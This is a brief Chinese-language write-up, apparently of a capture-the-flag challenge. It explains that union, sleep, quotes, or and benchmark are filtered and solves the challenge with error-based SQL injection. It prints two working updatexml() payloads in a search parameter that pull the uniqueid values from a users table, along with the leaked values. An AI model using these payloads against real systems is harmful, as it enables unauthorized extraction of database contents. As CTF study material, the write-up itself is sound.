提示过滤了 union sleep 单双引号 or和benchmark。很明显的报错注入。
最后
?search=1 and (updatexml(1,concat(0x7e,((select group_concat(uniqueid) from users)),0x7e),1));
?search=1 and (updatexml(1,concat(0x7e,(substr((select group_concat(uniqueid) from users),32,50)),0x7e),1));
837461526918364526,123456789928466788
爆出来两个uniqueid 随便输一个